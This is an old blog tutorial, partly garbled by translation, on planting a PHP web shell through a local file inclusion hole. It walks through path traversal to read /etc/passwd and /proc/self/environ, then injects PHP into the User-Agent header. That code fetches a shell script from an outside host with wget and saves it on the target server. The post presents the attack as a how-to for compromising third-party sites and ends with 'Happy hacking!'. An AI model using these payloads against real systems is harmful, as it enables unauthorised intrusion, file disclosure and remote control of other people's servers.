Main Menu

Hellcome To my Blog site , visit my facebook:riyan facebook. بِسْــــــــــــــمِ اللهِ الرَّحْمَنِ الرَّحِيْـــــمِ

Monday, July 18, 2011

tutorial lfi

How to plant a shell through the LFI (Local file disclosure) by the method proc / self / environ
 
Writer: gunslinger_
 
with this tutorial I will explain how to create a shell on the target server through the LFI method proc / self / environ.Ok we just ...
 
1. we find the websites that are vulnerable to attack by LFI.
 
example: http://site.com/info.php?file=news.php
 
2. let's replace the "news.php" with "../../../".
 
example: http://site.com/info.php?file=../../../
 
then we got an error, as follows ...
 
Warning: include (../../../) [function.include]: failed to open stream: No such file or directory in / home / Gunslinger / public_html / info.php on line 99
 
ok it seems, we have the opportunity to take advantage of include into another file.selanjutanya we try to find / etc / passwd.
 
example: http://site.com/info.php?file=etc/passwd
 
But we still got an error like the following:
 
Warning: include (/ etc / passwd) [function.include]: failed to open stream: No such file or directory in / home / Gunslinger / public_html / info.php on line 99
 
what if we directorynya Raise?let's try ...
 
example: http://site.com/info.php?file=../../../../../../../../../etc/passwd
 
Ahoy, we managed to get the file / etc / passwd file that looks like the following:
 
root: x: 0:0: root: / root: / bin / bashdaemon: x: 1:1: daemon: / usr / sbin: / bin / shbin: x: 2:2: bin: / bin: / bin / shsys: x: 3:3: sys: / dev: / bin / shsync: x: 4:65534: sync: / bin: / bin / syncgames: x: 5:60: games: / usr / games: / bin / shman: x: 6:12: man: / var / cache / man: / bin / shlp: x: 7:7: lp: / var / spool / lpd: / bin / shmail: x: 8:8: mail: / var / mail: / bin / shnews: x: 9:9: news: / var / spool / news: / bin / shuucp: x: 10:10: uucp: / var / spool / uucp: / bin / shproxy: x: 13:13: proxy: / bin: / bin / shwww-data: x: 33:33: www-data: / var / www: / bin / shbackup: x: 34:34: backup: / var / backups: / bin / shlist: x: 38:38: Mailing List Manager: / var / list: / bin / shirc: x: 39:39: IRCd: / var / run / IRCd: / bin / shGNATS: x: 41:41: GNATS Bug-Reporting System (admin): / var / lib / GNATS: / bin / shnobody: x: 65534:65534: nobody: / ​​nonexistent: / bin / shlibuuid: x: 100:101:: / var / lib / libuuid: / bin / shsyslog: x: 101:102:: / home / syslog: / bin / falseklog: x: 102:103:: / home / klog: / bin / falsehplip: x: 103:7: HPLIP system user ,,,:/ var / run / hplip: / bin / falseavahi-autoipd: x: 104:110: Avahi daemon AutoIP ,,,:/ var / lib / avahi-autoipd: / bin / falsegdm: x: 105:111: Gnome Display Manager: / var / lib / gdm: / bin / falsesaned: x: 106:113:: / home / saned: / bin / falsepulse: x: 107:114: PulseAudio daemon ,,,:/ var / run / pulse: / bin / falsemessagebus: x: 108:117:: / var / run / dbus: / bin / falsepolkituser: x: 109:118: PolicyKit ,,,:/ var / run / PolicyKit: / bin / falseavahi: x: 110:119: Avahi mDNS daemon ,,,:/ var / run / avahi-daemon: / bin / falsehaldaemon: x: 111:120: Hardware abstraction layer ,,,:/ var / run / hald: / bin / falseGunslinger: x: 1000:1000: gunslinger_ ,,,:/ home / Gunslinger: / bin / bashsnmp: x: 112:65534:: / var / lib / snmp: / bin / falseguest: x: 113:124: Guest ,,,:/ tmp / guest-home.rRZGXM: / bin / bashsshd: x: 114:65534:: / var / run / sshd: / usr / sbin / nologin
 
3. let us check whether / proc / self / environ can we access?Now, replace "/ etc / passwd" with "/ proc / self / environ"
 
example: http://site.com/info.php?file=../../../../../../../../../proc/self/environ
 
If you get something like this:
 
DOCUMENT_ROOT = / home / Gunslinger / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT = text / html, application / xml; q = 0.9, application / xhtml + xml, image / png, image / jpeg, image / gif, image / x-xbitmap , * / *; q = 0.1 HTTP_COOKIE = PHPSESSID = 3g4t67261b341231b94r1844ac2ad7ac HTTP_HOST = www.site.com HTTP_REFERER = http://www.site.com/index.php?view=../../../../ .. / .. / etc / passwd HTTP_USER_AGENT = Mozilla/5.0 (X11; U; Linux i686; en-US; rv: 1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15PATH = / bin: / usr / bin QUERY_STRING = view =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron REDIRECT_STATUS = 200 REMOTE_ADDR = 6x.1xx. 4x.1xx REMOTE_PORT = 35665 REQUEST_METHOD = GET REQUEST_URI = / index.php? view =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron SCRIPT_FILENAME = / home / Gunslinger / public_html / index.php SCRIPT_NAME = / index.php SERVER_ADDR = 1xx.1xx.1xx.6x SERVER_ADMIN = gunslinger@site.com SERVER_NAME = www.site.com SERVER_PORT = 80 SERVER_PROTOCOL = HTTP/1.0 SERVER_SIGNATURE =Apache/2.2.11 (Unix) DAV / 2 mod_ssl/2.2.11 PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 OpenSSL/0.9.8k Server at www.site.com Port 80
 
Apparently proc / self / environ can we access!if you get a blank page (blank) / proc / self / environ can not be accessed or may beroperating system * BSD
 
4. Now let us dengann malicious code injection with poison http-header. how can we menginjeksinya? we can use the tamper data in firefox addon.you can download here: https://addons.mozilla.org/en-US/firefox/addon/966open the tamper data in firefox and then enter the url / proc / self / environ that had "http://site.com/info.php?file=../../../../../../. . / .. / .. / proc / self / environ "then the user-agent fill in the following code:view sourceprint?1 <? System ('wget-O http://r57.gen.tr/c100.txt shell.php');?>
 
orview sourceprint?1 <? Exec ('wget-O http://r57.gen.tr/c100.txt shell.php');?>
 
then submit.
 
5. if we managed to inject malicious code below, then the shell will be there in a place like this.
 
www.http://site.com/shell.php
 
Happy hacking!